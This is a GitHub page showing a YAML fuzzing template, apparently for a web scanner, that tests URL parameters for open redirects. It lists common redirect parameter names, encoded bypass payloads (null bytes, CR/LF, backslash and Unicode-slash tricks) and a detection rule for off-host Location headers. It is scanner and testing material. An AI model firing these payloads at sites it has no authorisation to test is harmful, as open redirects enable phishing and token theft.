-
-
Notifications
You must be signed in to change notification settings - Fork 72
/
open-redirect-param.yaml
69 lines (66 loc) · 1.41 KB
/
open-redirect-param.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
id: open-param-fuzz-01
type: fuzz
level: 2
level: 4
info:
name: Open Redirect FUZZ on Param
risk: Medium
variables:
- prefix: |
http://
https://
- dest: |
google.com
example.com
- name: |
next
url
target
to
rurl
return
dest
redirect
destination
redirect_uri
redirect_url
redir
view
image_url
go
returnTo
return_to
checkout_url
continue
return_path
payloads:
- '{{.dest}}'
- '/{{.dest}}'
- '\{{.dest}}'
- '//{{.dest}}/'
- '\/\/{{.dest}}/'
- '%00\/\/{{.dest}}/'
- '/%00/{{.dest}}/'
- '/%09/{{.dest}}/'
- '/%0a/{{.dest}}/'
- '/%0d/{{.dest}}/'
- '////{{.dest}}/%2f%2e%2e'
- '/%5c{{.dest}}/%2f%2e%2e'
- '/〱{{.dest}}/%2f%2e%2e'
- '@{{.dest}}'
- '{{.prefix}}{{.dest}}'
- '/{{.prefix}}{{.dest}}'
- '\{{.prefix}}{{.dest}}'
- '//{{.prefix}}{{.dest}}/'
- '\/\/{{.prefix}}{{.dest}}/'
- '%00\/\/{{.prefix}}{{.dest}}/'
- '////{{.prefix}}{{.dest}}/%2f%2e%2e'
- '/%5c{{.prefix}}{{.dest}}/%2f%2e%2e'
- '/〱{{.prefix}}{{.dest}}/%2f%2e%2e'
- '@{{.prefix}}{{.dest}}'
requests:
- generators:
- Query("{{.payload}}", "{{.name}}")
detections:
- >-
(StatusCode() >= 300 && StatusCode() < 400) && RegexSearch("resHeaders", "Location:\\s(http|https?:)([\\/]+){{.dest}}") && !StringSearch("resHeaders", "Location: https://{{.Host}}")